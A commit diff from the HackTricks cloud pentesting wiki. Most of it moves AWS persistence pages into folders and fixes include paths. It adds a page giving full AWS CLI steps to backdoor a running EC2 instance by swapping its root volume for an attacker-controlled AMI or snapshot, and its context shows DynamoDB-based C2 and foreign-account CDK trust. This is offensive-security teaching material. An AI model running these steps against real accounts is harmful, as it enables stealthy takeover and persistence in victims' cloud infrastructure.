HackTricks-wiki
diff --git a/‎src/SUMMARY.md‎
Lines changed: 130 additions & 112 deletions b/‎src/SUMMARY.md‎
Lines changed: 130 additions & 112 deletions
diff --git a/‎src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md‎ renamed to ‎src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence/README.md‎
Lines changed: 3 additions & 3 deletions b/‎src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md‎ renamed to ‎src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence/README.md‎
Lines changed: 3 additions & 3 deletions
diff --git a/‎src/pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.md‎ renamed to ‎src/pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence/README.md‎
Lines changed: 3 additions & 3 deletions b/‎src/pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.md‎ renamed to ‎src/pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence/README.md‎
Lines changed: 3 additions & 3 deletions
diff --git a/‎src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md‎ renamed to ‎src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence/README.md‎
Lines changed: 4 additions & 4 deletions b/‎src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md‎ renamed to ‎src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence/README.md‎
Lines changed: 4 additions & 4 deletions
diff --git a/‎src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md‎ renamed to ‎src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence/README.md‎
Lines changed: 3 additions & 3 deletions b/‎src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md‎ renamed to ‎src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence/README.md‎
Lines changed: 3 additions & 3 deletions
diff --git a/‎src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md‎ renamed to ‎src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence/README.md‎
Lines changed: 12 additions & 6 deletions b/‎src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md‎ renamed to ‎src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence/README.md‎
Lines changed: 12 additions & 6 deletions
diff --git a/‎src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-replace-root-volume-persistence/README.md‎
Lines changed: 79 additions & 0 deletions b/‎src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-replace-root-volume-persistence/README.md‎
Lines changed: 79 additions & 0 deletions
diff --git a/‎src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md‎
Lines changed: 0 additions & 101 deletions b/‎src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md‎
Lines changed: 0 additions & 101 deletions
@@ -1,13 +1,13 @@
 # AWS - API Gateway Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## API Gateway
 
 For more information go to:
 
 {{#ref}}
-../aws-services/aws-api-gateway-enum.md
+../../aws-services/aws-api-gateway-enum.md
 {{#endref}}
 
 ### Resource Policy
@@ -29,7 +29,7 @@ Or just remove the use of the authorizer.
 If API keys are used, you could leak them to maintain persistence or even create new ones.\
 Or just remove the use of API keys.
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
 
 
@@ -1,13 +1,13 @@
 # AWS - Cloudformation Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## CloudFormation
 
 For more information, access:
 
 {{#ref}}
-../aws-services/aws-cloudformation-and-codestar-enum.md
+../../aws-services/aws-cloudformation-and-codestar-enum.md
 {{#endref}}
 
 ### CDK Bootstrap Stack
@@ -22,4 +22,4 @@ cdk bootstrap --trust 1234567890
 aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890
 ```
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../../banners/hacktricks-training.md}}
@@ -1,13 +1,13 @@
 # AWS - Cognito Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## Cognito
 
 For more information, access:
 
 {{#ref}}
-../aws-services/aws-cognito-enum/
+../../aws-services/aws-cognito-enum/
 {{#endref}}
 
 ### User persistence
@@ -24,7 +24,7 @@ Cognito is a service that allows to give roles to unauthenticated and authentica
 Check how to do these actions in
 
 {{#ref}}
-../aws-privilege-escalation/aws-cognito-privesc.md
+../../aws-privilege-escalation/aws-cognito-privesc/README.md
 {{#endref}}
 
 ### `cognito-idp:SetRiskConfiguration`
@@ -39,7 +39,7 @@ By default this is disabled:
 
 <figure><img src="https://lh6.googleusercontent.com/EOiM0EVuEgZDfW3rOJHLQjd09-KmvraCMssjZYpY9sVha6NcxwUjStrLbZxAT3D3j9y08kd5oobvW8a2fLUVROyhkHaB1OPhd7X6gJW3AEQtlZM62q41uYJjTY1EJ0iQg6Orr1O7yZ798EpIJ87og4Tbzw=s2048" alt=""><figcaption></figcaption></figure>
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
 
 
@@ -1,13 +1,13 @@
 # AWS - DynamoDB Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ### DynamoDB
 
 For more information access:
 
 {{#ref}}
-../aws-services/aws-dynamodb-enum.md
+../../aws-services/aws-dynamodb-enum.md
 {{#endref}}
 
 ### DynamoDB Triggers with Lambda Backdoor
@@ -60,7 +60,7 @@ aws dynamodb put-item \
 
 The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
 
 
@@ -1,13 +1,13 @@
 # AWS - EC2 Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## EC2
 
 For more information check:
 
 {{#ref}}
-../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
+../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
 {{#endref}}
 
 ### Security Group Connection Tracking Persistence
@@ -34,7 +34,7 @@ Spot instances are **cheaper** than regular instances. An attacker could launch
 An attacker could get access to the instances and backdoor them:
 
 - Using a traditional **rootkit** for example
-- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
+- Adding a new **public SSH key** (check [EC2 privesc options](../../aws-privilege-escalation/aws-ec2-privesc/README.md))
 - Backdooring the **User Data**
 
 ### **Backdoor Launch Configuration**
@@ -43,6 +43,14 @@ An attacker could get access to the instances and backdoor them:
 - Backdoor the User Data
 - Backdoor the Key Pair
 
+### EC2 ReplaceRootVolume Task (Stealth Backdoor)
+
+Swap the root EBS volume of a running instance for one built from an attacker-controlled AMI or snapshot using `CreateReplaceRootVolumeTask`. The instance keeps its ENIs, IPs, and role, effectively booting into malicious code while appearing unchanged.
+
+{{#ref}}
+../aws-ec2-replace-root-volume-persistence/README.md
+{{#endref}}
+
 ### VPN
 
 Create a VPN so the attacker will be able to connect directly through i to the VPC.
@@ -51,8 +59,6 @@ Create a VPN so the attacker will be able to connect directly through i to the V
 
 Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
 
-{{#include ../../../banners/hacktricks-training.md}}
-
-
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
@@ -0,0 +1,79 @@
+# AWS - EC2 ReplaceRootVolume Task (Stealth Backdoor / Persistence)
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+Abuse **ec2:CreateReplaceRootVolumeTask** to swap the root EBS volume of a running instance with one restored from an attacker-controlled AMI or snapshot. The instance is rebooted automatically and resumes with the attacker-controlled root filesystem while preserving ENIs, private/public IPs, attached non-root volumes, and the instance metadata/IAM role.
+
+## Requirements
+- Target instance is EBS-backed and running in the same region.
+- Compatible AMI or snapshot: same architecture/virtualization/boot mode (and product codes, if any) as the target instance.
+
+## Pre-checks
+```bash
+REGION=us-east-1
+INSTANCE_ID=<victim instance>
+
+# Ensure EBS-backed
+aws ec2 describe-instances   --region $REGION --instance-ids $INSTANCE_ID   --query 'Reservations[0].Instances[0].RootDeviceType' --output text
+
+# Capture current network and root volume
+ROOT_DEV=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID   --query 'Reservations[0].Instances[0].RootDeviceName' --output text)
+ORIG_VOL=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID   --query "Reservations[0].Instances[0].BlockDeviceMappings[?DeviceName==\`$ROOT_DEV\`].Ebs.VolumeId" --output text)
+PRI_IP=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID   --query 'Reservations[0].Instances[0].PrivateIpAddress' --output text)
+ENI_ID=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID   --query 'Reservations[0].Instances[0].NetworkInterfaces[0].NetworkInterfaceId' --output text)
+```
+
+## Replace root from AMI (preferred)
+```bash
+IMAGE_ID=<attacker-controlled compatible AMI>
+
+# Start task
+TASK_ID=$(aws ec2 create-replace-root-volume-task   --region $REGION --instance-id $INSTANCE_ID --image-id $IMAGE_ID   --query 'ReplaceRootVolumeTaskId' --output text)
+
+# Poll until state == succeeded
+while true; do
+  STATE=$(aws ec2 describe-replace-root-volume-tasks --region $REGION     --replace-root-volume-task-ids $TASK_ID     --query 'ReplaceRootVolumeTasks[0].TaskState' --output text)
+  echo "$STATE"; [ "$STATE" = "succeeded" ] && break; [ "$STATE" = "failed" ] && exit 1; sleep 10;
+done
+```
+
+Alternative using a snapshot:
+```bash
+SNAPSHOT_ID=<snapshot with bootable root FS compatible with the instance>
+aws ec2 create-replace-root-volume-task   --region $REGION --instance-id $INSTANCE_ID --snapshot-id $SNAPSHOT_ID
+```
+
+## Evidence / Verification
+```bash
+# Instance auto-reboots; network identity is preserved
+NEW_VOL=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID   --query "Reservations[0].Instances[0].BlockDeviceMappings[?DeviceName==\`$ROOT_DEV\`].Ebs.VolumeId" --output text)
+
+# Compare before vs after
+printf "ENI:%s IP:%s
+ORIG_VOL:%s
+NEW_VOL:%s
+" "$ENI_ID" "$PRI_IP" "$ORIG_VOL" "$NEW_VOL"
+
+# (Optional) Inspect task details and console output
+aws ec2 describe-replace-root-volume-tasks --region $REGION   --replace-root-volume-task-ids $TASK_ID --output json
+aws ec2 get-console-output --region $REGION --instance-id $INSTANCE_ID --latest --output text
+```
+Expected: ENI_ID and PRI_IP remain the same; the root volume ID changes from $ORIG_VOL to $NEW_VOL. The system boots with the filesystem from the attacker-controlled AMI/snapshot.
+
+## Notes
+- The API does not require you to manually stop the instance; EC2 orchestrates a reboot.
+- By default, the replaced (old) root EBS volume is detached and left in the account (DeleteReplacedRootVolume=false). This can be used for rollback or must be deleted to avoid costs.
+
+## Rollback / Cleanup
+```bash
+# If the original root volume still exists (e.g., $ORIG_VOL is in state "available"),
+# you can create a snapshot and replace again from it:
+SNAP=$(aws ec2 create-snapshot --region $REGION --volume-id $ORIG_VOL   --description "Rollback snapshot for $INSTANCE_ID" --query SnapshotId --output text)
+aws ec2 wait snapshot-completed --region $REGION --snapshot-ids $SNAP
+aws ec2 create-replace-root-volume-task --region $REGION --instance-id $INSTANCE_ID --snapshot-id $SNAP
+
+# Or simply delete the detached old root volume if not needed:
+aws ec2 delete-volume --region $REGION --volume-id $ORIG_VOL
+```
+
+{{#include ../../../../banners/hacktricks-training.md}}